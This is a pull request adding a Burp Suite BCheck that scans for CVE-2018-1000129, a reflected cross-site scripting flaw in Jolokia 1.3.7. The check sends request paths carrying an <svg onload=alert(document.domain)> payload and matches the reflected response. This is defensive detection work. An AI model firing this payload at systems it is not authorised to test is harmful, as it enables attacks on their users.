### PR TITLE
Create BCheck: CVE-2018-1000129 - Jolokia 1.3.7 - Cross-Site Scripting

### DIFF
--- a/CVE20181000129Jolokia137CrossSiteScripting.bcheck
+++ b/CVE20181000129Jolokia137CrossSiteScripting.bcheck
@@ -1,0 +1,28 @@
+metadata:
+    language: v1-beta
+    name: "CVE-2018-1000129 - Jolokia 1.3.7 - Cross-Site Scripting"
+    description: "Jolokia 1.3.7 is vulnerable to cross-site scripting in the HTTP servlet and allows an attacker to execute malicious JavaScript in the victim's browser."
+    author: "Mateusz Dabrowski (dbrwsky)"
+    tags: "jolokia", "xss", "cve"
+
+run for each:
+    potential_path =
+        "/api/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html",
+        "/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"
+
+given host then
+    send request called check:
+        method: "GET"
+        path: {potential_path}
+
+    if {check.response.status_code} is "200" 
+        and "<svg onload=alert(document.domain)>" in {check.response.body} 
+        and "java.lang.IllegalArgumentException" in {check.response.body}
+        and "No type with name" in {check.response.body} 
+        and "text/html" in {check.response.headers} then
+            report issue:
+                severity: medium
+                confidence: certain
+                detail: `Jolokia 1.3.7 is vulnerable to cross-site scripting in the HTTP servlet and allows an attacker to execute malicious JavaScript in the victim's browser.`
+                remediation: "Upgrade Jolokia to the latest version"
+	end if


### PR DESCRIPTION
Name: CVE-2018-1000129 - Jolokia 1.3.7 - Cross-Site Scripting
Author: Mateusz Dabrowski (dbrwsky)
Description: Jolokia 1.3.7 is vulnerable to cross-site scripting in the HTTP servlet and allows an attacker to execute malicious JavaScript in the victim's browser.
